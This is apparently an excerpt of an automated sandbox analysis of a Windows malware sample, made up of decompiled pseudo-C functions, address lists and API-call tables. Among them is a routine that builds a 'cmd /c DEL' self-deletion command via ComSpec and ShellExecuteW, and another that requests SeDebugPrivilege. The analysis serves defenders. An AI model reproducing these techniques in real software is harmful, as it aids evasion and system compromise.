							_t19 = 0x800;
							if(_t26 < 0x800) {
								_t19 = _t26;
							}
							_t20 = _t19 + _t26;
							if(_t19 + _t26 < _t26) {
								L7:
								_t5 = _t26 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t26) {
									goto L11;
								} else {
									_t22 = E0042D1AB(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E0042D1AB(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t41 = _t22 + (_t36 >> 2) * 4;
									__imp__EncodePointer(_t22);
									 *0x4833b4 = _t22;
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}

0x0042bca3
0x0042bcb0
0x0042bcb8
0x0042bcba
0x0042bcbd
0x0042bcbf
0x0042bcc3
0x0042bd4a
0x0042bd4a
0x0042bcc9
0x0042bccb
0x0042bccd
0x0042bcd3
0x00000000
0x0042bcd5
0x0042bcdb
0x0042bcdd
0x0042bce3
0x0042bd2d
0x0042bd30
0x0042bd36
0x0042bd38
0x0042bd3e
0x0042bd40
0x0042bd45
0x0042bce5
0x0042bce5
0x0042bcec
0x0042bcee
0x0042bcee
0x0042bcf0
0x0042bcf4
0x0042bd05
0x0042bd05
0x0042bd05
0x0042bd0a
0x00000000
0x0042bd0c
0x0042bd10
0x0042bd19
0x00000000
0x00000000
0x00000000
0x00000000
0x0042bd19
0x0042bcf6
0x0042bcfa
0x0042bd03
0x0042bd1b
0x0042bd1f
0x0042bd22
0x0042bd28
0x00000000
0x00000000
0x00000000
0x00000000
0x0042bd03
0x0042bcf4
0x0042bce3
0x0042bcd3
0x0042bd50

APIs

DecodePointer.KERNEL32(004404D8,0043130C,00000001,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BCB0
DecodePointer.KERNEL32(?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BCBD

Part of subcall function 0042F682: HeapSize.KERNEL32(00000000,00000000,?,0042BCDB,00000000,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20), ref: 0042F6AD

Part of subcall function 0042D1AB: Sleep.KERNEL32(00000000,00000000,00000000,?,0042BD15,00000000,00000010,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001), ref: 0042D1D5

EncodePointer.KERNEL32(00000000,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BD22
EncodePointer.KERNEL32(00000001,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BD36
EncodePointer.KERNEL32(-00000004,?,?,0042BD9F,00000001,0043C308,0000000C,0042BDCB,00000001,?,00426A43,00430A20,00000001), ref: 0042BD3E

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041FC50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83

C-Code - Quality: 52%

			E0041FC50(intOrPtr __ebx, WCHAR* __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				signed int _v8;
				short _v8200;
				char _v16392;
				signed int _t16;
				intOrPtr* _t18;
				long _t23;
				intOrPtr* _t29;
				void* _t31;
				signed int _t48;

				_t47 = __esi;
				_t46 = __edi;
				_t44 = __edx;
				_t34 = __ebx;
				E0042E220(0x4004);
				_t16 =  *0x43f054; // 0xd46ffb00
				_v8 = _t16 ^ _t48;
				_t18 = E00413000(__edx, 0, 1, 0x774393fe);
				_push(0x1000);
				_push( &_v8200);
				_push(0);
				if( *_t18() == 0) {
					L5:
					return E004256FE(0, _t34, _v8 ^ _t48, _t44, _t46, _t47);
				} else {
					_t44 =  &_v8200;
					_t23 = GetShortPathNameW( &_v8200,  &_v8200, 0x1000); // executed
					if(_t23 == 0) {
						goto L5;
					} else {
						E00425E37( &_v16392, 0x1000, L"/c ", 0x1000);
						E00425ACD( &_v16392, 0x1000, L"DE");
						E00425ACD( &_v16392, 0x1000, L"L ");
						_t44 =  &_v16392;
						E00425ACD( &_v16392, 0x1000,  &_v8200);
						_t29 = E00413000( &_v16392, 0, 1, 0x9802ef26);
						_push(0x1000);
						_push( &_v8200);
						_push(L"ComSpec");
						if( *_t29() == 0) {
							goto L5;
						} else {
							_t44 =  &_v8200;
							_t31 = E00420870( &_v16392,  &_v8200); // executed
							if(_t31 <= 0x20) {
								goto L5;
							} else {
								return E004256FE(1, __ebx, _v8 ^ _t48,  &_v8200, __edi, __esi);
							}
						}
					}
				}
			}

0x0041fc50
0x0041fc50
0x0041fc50
0x0041fc50
0x0041fc5a
0x0041fc5f
0x0041fc66
0x0041fc72
0x0041fc7a
0x0041fc85
0x0041fc86
0x0041fc8c
0x0041fd63
0x0041fd72
0x0041fc92
0x0041fc97
0x0041fca1
0x0041fca9
0x00000000
0x0041fcaf
0x0041fcc5
0x0041fcdb
0x0041fcf1
0x0041fcfd
0x0041fd09
0x0041fd17
0x0041fd1f
0x0041fd2a
0x0041fd2b
0x0041fd34
0x00000000
0x0041fd36
0x0041fd36
0x0041fd43
0x0041fd4e
0x00000000
0x0041fd50
0x0041fd62
0x0041fd62
0x0041fd4e
0x0041fd34
0x0041fca9

APIs

GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 00420870: ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000,75FF6C07,7600CD44), ref: 0042096B

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

/c , xrefs: 0041FCB4
ComSpec, xrefs: 0041FD2B

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00426B68, Relevance: 4.6, APIs: 3, Instructions: 98

C-Code - Quality: 31%

			E00426B68(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t45;
				void* _t55;
				void* _t59;
				intOrPtr _t61;
				void* _t62;

				_t56 = __edi;
				_t43 = __ebx;
				_push(0x58);
				_push(0x43c150);
				E00428E80(__ebx, __edi, __esi);
				GetStartupInfoW(_t59 - 0x68);
				_t61 =  *0x4833a8; // 0x0
				if(_t61 == 0) {
					__imp__HeapSetInformation(0, 1, 0, 0);
				}
				_t62 =  *0x400000 - 0x5a4d; // 0x5a4d
				if(_t62 == 0) {
					_t22 =  *0x40003c; // 0x118
					__eflags =  *((intOrPtr*)(_t22 + 0x400000)) - 0x4550;
					if( *((intOrPtr*)(_t22 + 0x400000)) != 0x4550) {
						goto L3;
					} else {
						__eflags =  *((intOrPtr*)(_t22 + 0x400018)) - 0x10b;
						if( *((intOrPtr*)(_t22 + 0x400018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t22 + 0x400074)) - 0xe;
							if( *((intOrPtr*)(_t22 + 0x400074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t22 + 0x4000e8);
								_t8 =  *(_t22 + 0x4000e8) != 0;
								__eflags = _t8;
								 *(_t59 - 0x1c) = 0 | _t8;
							}
						}
					}
				} else {
					L3:
					 *(_t59 - 0x1c) = 0;
				}
				if(E00428991() == 0) {
					E00426B3F(0x1c);
				}
				if(E0042AB4E(_t43, _t55) == 0) {
					E00426B3F(0x10);
				}
				E0042BDD5();
				 *((intOrPtr*)(_t59 - 4)) = 0;
				_t26 = E0042B2F2(); // executed
				_t65 = _t26;
				if(_t26 < 0) {
					E00426972(_t55, _t65, 0x1b);
				}
				 *0x4833a4 = GetCommandLineW();
				 *0x4404ec = E0042C5BC();
				_t29 = E0042C50E();
				_t66 = _t29;
				if(_t29 < 0) {
					_t29 = E00426972(_t55, _t66, 8);
				}
				_t30 = E0042C2DC(_t29, _t43);
				_t67 = _t30;
				if(_t30 < 0) {
					E00426972(_t55, _t67, 9);
				}
				_t31 = E00426751(_t56, 0, 1); // executed
				_t68 = _t31;
				if(_t31 != 0) {
					E00426972(_t55, _t68, _t31);
				}
				_t32 = E0042C296();
				_t69 =  *(_t59 - 0x3c) & 0x00000001;
				if(( *(_t59 - 0x3c) & 0x00000001) == 0) {
					_t45 = 0xa;
				} else {
					_t45 =  *(_t59 - 0x38) & 0x0000ffff;
				}
				_t33 = E0041F040(_t69, 0x400000, 0, _t32, _t45); // executed
				 *((intOrPtr*)(_t59 - 0x20)) = _t33;
				if( *(_t59 - 0x1c) == 0) {
					E00426928(_t33); // executed
				}
				E00426954();
				 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
				return E00428EC5( *((intOrPtr*)(_t59 - 0x20)));
			}

0x00426b68
0x00426b68
0x00426b68
0x00426b6a
0x00426b6f
0x00426b78
0x00426b80
0x00426b86
0x00426b8d
0x00426b8d
0x00426b98
0x00426b9f
0x00426ba6
0x00426bab
0x00426bb5
0x00000000
0x00426bb7
0x00426bbc
0x00426bc3
0x00000000
0x00426bc5
0x00426bc5
0x00426bcc
0x00000000
0x00426bce
0x00426bd0
0x00426bd6
0x00426bd6
0x00426bd9
0x00426bd9
0x00426bcc
0x00426bc3
0x00426ba1
0x00426ba1
0x00426ba1
0x00426ba1
0x00426be3
0x00426be7
0x00426bec
0x00426bf4
0x00426bf8
0x00426bfd
0x00426bfe
0x00426c03
0x00426c06
0x00426c0b
0x00426c0d
0x00426c11
0x00426c16
0x00426c1d
0x00426c27
0x00426c2c
0x00426c31
0x00426c33
0x00426c37
0x00426c3c
0x00426c3d
0x00426c42
0x00426c44
0x00426c48
0x00426c4d
0x00426c50
0x00426c56
0x00426c58
0x00426c5b
0x00426c60
0x00426c61
0x00426c66
0x00426c6a
0x00426c74
0x00426c6c
0x00426c6c
0x00426c6c
0x00426c7d
0x00426c82
0x00426c88
0x00426c8b
0x00426c8b
0x00426c90
0x00426cc5
0x00426cd4

APIs

GetStartupInfoW.KERNEL32(?,0043C150,00000058), ref: 00426B78
HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00426B8D

Part of subcall function 00428991: HeapCreate.KERNELBASE(00000000,00001000,00000000,00426BE1), ref: 0042899A

Part of subcall function 0042AB4E: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00426BF2), ref: 0042AB56
Part of subcall function 0042AB4E: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00426BF2), ref: 0042AB78
Part of subcall function 0042AB4E: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00426BF2), ref: 0042AB85
Part of subcall function 0042AB4E: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00426BF2), ref: 0042AB92
Part of subcall function 0042AB4E: GetProcAddress.KERNEL32(00000000,FlsFree,?,00426BF2), ref: 0042AB9F
Part of subcall function 0042AB4E: TlsAlloc.KERNEL32(?,00426BF2), ref: 0042ABEF
Part of subcall function 0042AB4E: TlsSetValue.KERNEL32(00000000,?,00426BF2), ref: 0042AC0A
Part of subcall function 0042AB4E: EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC25
Part of subcall function 0042AB4E: EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC32
Part of subcall function 0042AB4E: EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC3F
Part of subcall function 0042AB4E: EncodePointer.KERNEL32(?,00426BF2), ref: 0042AC4C
Part of subcall function 0042AB4E: DecodePointer.KERNEL32(0042AA1F,?,00426BF2), ref: 0042AC6D
Part of subcall function 0042AB4E: DecodePointer.KERNEL32(00000000,?,00426BF2), ref: 0042AC9C
Part of subcall function 0042AB4E: GetCurrentThreadId.KERNEL32(?,00426BF2), ref: 0042ACAE

Part of subcall function 0042B2F2: GetStartupInfoW.KERNEL32(?), ref: 0042B2FF
Part of subcall function 0042B2F2: GetFileType.KERNEL32(?), ref: 0042B432
Part of subcall function 0042B2F2: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042B468
Part of subcall function 0042B2F2: GetStdHandle.KERNEL32(-000000F6), ref: 0042B4BC
Part of subcall function 0042B2F2: GetFileType.KERNEL32(00000000), ref: 0042B4CE
Part of subcall function 0042B2F2: InitializeCriticalSectionAndSpinCount.KERNEL32(-00482274,00000FA0), ref: 0042B4FC
Part of subcall function 0042B2F2: SetHandleCount.KERNEL32 ref: 0042B525

GetCommandLineW.KERNEL32 ref: 00426C17

Part of subcall function 0042C5BC: GetEnvironmentStringsW.KERNEL32(00000000,00426C27), ref: 0042C5BF
Part of subcall function 0042C5BC: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042C5FB

Part of subcall function 0042C50E: GetModuleFileNameW.KERNEL32(00000000,C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe,00000104), ref: 0042C52E

Part of subcall function 0041F040: AllocateAndInitializeSid.ADVAPI32 ref: 0041F09B
Part of subcall function 0041F040: CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041F0B4
Part of subcall function 0041F040: FreeSid.ADVAPI32(?), ref: 0041F0C7
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 0041F0E6
Part of subcall function 0041F040: CoCreateInstance.OLE32(0043B924,00000000,00000001,004312C8,?), ref: 0041F168
Part of subcall function 0041F040: ExitProcess.KERNEL32 ref: 0041F188
Part of subcall function 0041F040: CoCreateInstance.OLE32(0043B934,00000000,00000001,004312B8,?), ref: 0041F1A0
Part of subcall function 0041F040: ExitProcess.KERNEL32 ref: 0041F1DE
Part of subcall function 0041F040: LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041F2F2
Part of subcall function 0041F040: LoadStringW.USER32(00000000,00005509,00472238,000000FF), ref: 0041F310
Part of subcall function 0041F040: LoadStringW.USER32(00000000,00005527,00474238,000000FF), ref: 0041F322
Part of subcall function 0041F040: GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041F329
Part of subcall function 0041F040: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041F33D
Part of subcall function 0041F040: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041F34A
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,00478238), ref: 0041F35E
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0047A238), ref: 0041F36D
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,0047E238), ref: 0041F37C
Part of subcall function 0041F040: SHGetSpecialFolderPathW.SHELL32(00000000,00480238,00000005,00000000), ref: 0041F389
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,00470238), ref: 0041F3E4
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,00476238), ref: 0041F3F3
Part of subcall function 0041F040: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0047C238), ref: 0041F402
Part of subcall function 0041F040: GetModuleFileNameW.KERNEL32(00000000,0046C238,00001000), ref: 0041F410
Part of subcall function 0041F040: DeleteFileW.KERNELBASE(0046A238), ref: 0041F449
Part of subcall function 0041F040: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041F468
Part of subcall function 0041F040: GetLastError.KERNEL32 ref: 0041F524
Part of subcall function 0041F040: GetVersionExW.KERNEL32(00441738), ref: 0041F56D
Part of subcall function 0041F040: CreateThread.KERNEL32 ref: 0041F597
Part of subcall function 0041F040: SetThreadPriority.KERNEL32(00000000,000000F1,?,?,?,?,?,?,00000000,000001DF,004665A8,00000000,00441D28,00441D28,00441D28,00441D28), ref: 0041F7C5

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004233D0, Relevance: 3.0, APIs: 2, Instructions: 46

C-Code - Quality: 94%

			E004233D0(intOrPtr _a4, signed int _a8) {
				intOrPtr _t15;
				signed int _t18;
				signed int _t22;
				signed int _t28;
				signed int _t30;
				void* _t32;
				void* _t33;

				_t22 = _a8;
				_t28 = 0;
				_t34 = _t22;
				if(_t22 <= 0) {
					_t15 = _a4;
					__eflags = 0;
					 *((short*)(_t15 + _t22 * 2)) = 0;
					return _t15;
				} else {
					do {
						E00426B0C(GetTickCount());
						_t33 = _t32 + 4;
						do {
							_t18 = E00426B1E(_t34);
							asm("cdq");
							_t30 = _t18 % 0x7a;
						} while (_t30 < 0x61);
						E00426B0C(1);
						_t32 = _t33 + 4;
						 *(_a4 + _t28 * 2) = _t30;
						Sleep(0xf); // executed
						_t28 = _t28 + 1;
					} while (_t28 < _t22);
					 *((short*)(_a4 + _t22 * 2)) = 0;
					return 0;
				}
			}

0x004233d6
0x004233da
0x004233dc
0x004233de
0x00423430
0x00423433
0x00423436
0x0042343c
0x004233e0
0x004233e1
0x004233e8
0x004233ed
0x004233f0
0x004233f0
0x004233f5
0x004233fd
0x004233ff
0x00423406
0x0042340e
0x00423413
0x00423417
0x0042341d
0x0042341e
0x00423429
0x0042342f
0x0042342f

APIs

GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Sleep.KERNELBASE(0000000F), ref: 00423417

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00420870, Relevance: 1.6, APIs: 1, Instructions: 82

C-Code - Quality: 48%

			E00420870(short* __ecx, short* _a4) {
				signed int _v8;
				char _v136;
				int _v140;
				int _v144;
				short* _v148;
				short* _v152;
				void* _v156;
				void* _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				void* _t30;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				int _t38;
				intOrPtr _t47;
				char* _t52;
				intOrPtr _t53;
				signed int _t56;
				signed int _t58;
				void* _t59;

				_t56 = _t58;
				_t59 = _t58 - 0x9c;
				_t25 =  *0x43f054; // 0xd46ffb00
				_v8 = _t25 ^ _t56;
				_v152 = _a4;
				_t28 = 0;
				_v148 = __ecx;
				_t52 = 0x434498;
				_t38 = 0;
				_v144 = 0;
				_v160 = 0x434498;
				_v140 = 0;
				_t44 = 0xf2;
				while( *((intOrPtr*)(_t38 + 0x434498)) != _t44) {
					_t38 = _t38 + 1;
					if(_t38 < 0x80) {
						continue;
					} else {
						_v140 = _t38;
						L8:
						_t32 = E00413000(_t44, 0, 1, 0xa48d6762);
						_t59 = _t59 + 0xc;
						_push(_t52);
						if( *_t32() == 0) {
							_t33 = E00413000(_t44, _t28, 1, 0xc8ac8026);
							_t59 = _t59 + 0xc;
							_t28 =  *_t33(_t52);
						}
					}
					L10:
					E00412F20(_t28, 0x570bc88f);
					_t30 = ShellExecuteW(0, 0, _v152, _v148, 0, 0); // executed
					_pop(_t47);
					_pop(_t53);
					_pop(_t36);
					return E004256FE(_t30, _t36, _v8 ^ _t56, _v152, _t47, _t53);
				}
				_t44 =  &_v136;
				_v140 = _t38;
				_v156 =  &_v136;
				if(_t38 > 0) {
					asm("pushad");
					memcpy(_v156, _v160, _v140);
					_t59 = _t59 + 0xc;
					asm("popad");
					_t28 = _v144;
					_t38 = _v140;
				}
				 *((char*)(_t56 + _t38 - 0x84)) = 0;
				_t52 =  &_v136;
				if(_v136 != 0) {
					goto L8;
				}
				goto L10;
			}

0x00420873
0x00420875
0x0042087b
0x00420882
0x0042088a
0x00420890
0x00420892
0x00420898
0x0042089d
0x004208a0
0x004208a6
0x004208ac
0x004208b2
0x004208b4
0x004208bc
0x004208c3
0x00000000
0x004208c5
0x004208c5
0x0042091c
0x00420925
0x0042092a
0x0042092d
0x00420932
0x0042093c
0x00420941
0x00420945
0x00420945
0x00420932
0x00420947
0x0042094d
0x0042096b
0x00420970
0x00420971
0x00420974
0x0042097d
0x0042097d
0x004208cd
0x004208d3
0x004208d9
0x004208e1
0x004208e3
0x004208f6
0x004208f6
0x004208f8
0x004208f9
0x004208ff
0x004208ff
0x00420905
0x00420914
0x0042091a
0x00000000
0x00000000
0x00000000

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000,75FF6C07,7600CD44), ref: 0042096B

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 001A05DB, Relevance: 1.6, APIs: 1, Instructions: 56

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,001A0327,2B14D0EE,?), ref: 001A0607

Memory Dump Source

Source File: 00000000.00000002.227253422.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042BD51, Relevance: 1.5, APIs: 1, Instructions: 22

C-Code - Quality: 37%

			E0042BD51() {
				signed int* _t1;
				void* _t3;
				signed int* _t6;

				_t1 = E0042D15F(0x20, 4);
				_t6 = _t1;
				__imp__EncodePointer(_t6); // executed
				 *0x4833b4 = _t1;
				 *0x4833b0 = _t1;
				if(_t6 != 0) {
					 *_t6 =  *_t6 & 0x00000000;
					return 0;
				} else {
					_t3 = 0x18;
					return _t3;
				}
			}

0x0042bd58
0x0042bd5f
0x0042bd62
0x0042bd68
0x0042bd6d
0x0042bd74
0x0042bd7b
0x0042bd81
0x0042bd76
0x0042bd78
0x0042bd7a
0x0042bd7a

APIs

Part of subcall function 0042D15F: Sleep.KERNEL32(00000000), ref: 0042D187

EncodePointer.KERNEL32(00000000), ref: 0042BD62

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042BE21, Relevance: 1.5, APIs: 1, Instructions: 13

APIs

EncodePointer.KERNEL32(26A1D969,?,?,0042677D), ref: 0042BE2D

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00428991, Relevance: 1.5, APIs: 1, Instructions: 10

C-Code - Quality: 100%

			E00428991() {
				void* _t3;

				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x440820 = _t3;
				return 0 | _t3 != 0x00000000;
			}

0x0042899a
0x004289a7
0x004289ae

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00426BE1), ref: 0042899A

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004266D0, Relevance: 1.5, APIs: 1, Instructions: 8

C-Code - Quality: 100%

			E004266D0(int _a4) {

				E004266A5(_a4);
				ExitProcess(_a4);
			}

0x004266d8
0x004266e1

APIs

Part of subcall function 004266A5: GetModuleHandleW.KERNEL32(mscoree.dll,?,004266DD,00000000,?,0042594C,000000FF,0000001E,00000001,00000000,00000000,?,0042D12B,00000000,00000001,00000000), ref: 004266AF
Part of subcall function 004266A5: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,004266DD,00000000,?,0042594C,000000FF,0000001E,00000001,00000000,00000000,?,0042D12B,00000000,00000001), ref: 004266BF

ExitProcess.KERNEL32 ref: 004266E1

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042BA67, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

EncodePointer.KERNEL32(Function_0002BA2E,00426728,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042BA6C

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042A855, Relevance: 1.5, APIs: 1, Instructions: 3

APIs

EncodePointer.KERNEL32(00000000,0042D50B,00440828,00000314,00000000,?,?,?,?,?,00428B12,00440828,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A857

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042E650, Relevance: 1.3, APIs: 1, Instructions: 52

C-Code - Quality: 86%

			E0042E650(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = HeapAlloc( *0x440820, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x440e54;
					if( *0x440e54 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00428BCC(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00427125(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x0042e655
0x0042e65a
0x0042e677
0x0042e67c
0x0042e67e
0x0042e680
0x0042e682
0x0042e682
0x0042e682
0x00000000
0x0042e68a
0x0042e693
0x0042e699
0x0042e69b
0x00000000
0x00000000
0x0042e6cf
0x0042e6d1
0x00000000
0x0042e69d
0x0042e69d
0x0042e6a4
0x0042e6c2
0x0042e6c5
0x0042e6c7
0x0042e6c9
0x0042e6c9
0x0042e6a6
0x0042e6a7
0x0042e6ad
0x0042e6af
0x0042e683
0x0042e683
0x0042e685
0x0042e688
0x00000000
0x00000000
0x00000000
0x00000000
0x0042e6b1
0x0042e6b1
0x0042e6b4
0x0042e6b6
0x0042e6b8
0x0042e6b8
0x0042e6be
0x0042e6be
0x0042e6af
0x00000000
0x0042e65c
0x0042e660
0x0042e663
0x0042e666
0x00000000
0x0042e668
0x0042e66d
0x0042e676
0x0042e676
0x0042e666
0x00000000

APIs

HeapAlloc.KERNEL32(00000008,?,00000000,?,0042D175,00000000,?,00000000,00000000,00000000,?,0042A9B7,00000001,00000214), ref: 0042E693

Part of subcall function 00428BCC: DecodePointer.KERNEL32(?,0042E6AC,?,00000000,?,0042D175,00000000,?,00000000,00000000,00000000,?,0042A9B7,00000001,00000214), ref: 00428BD7

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042D15F, Relevance: 1.3, APIs: 1, Instructions: 30

C-Code - Quality: 100%

			E0042D15F(signed int _a4, signed int _a8) {
				void* _t4;
				long _t6;
				void* _t7;
				long _t8;
				void* _t9;
				void* _t12;
				void* _t13;

				_t8 = 0;
				while(1) {
					_t4 = E0042E650(_a4, _a8, 0); // executed
					_t7 = _t4;
					_t9 = _t9 + 0xc;
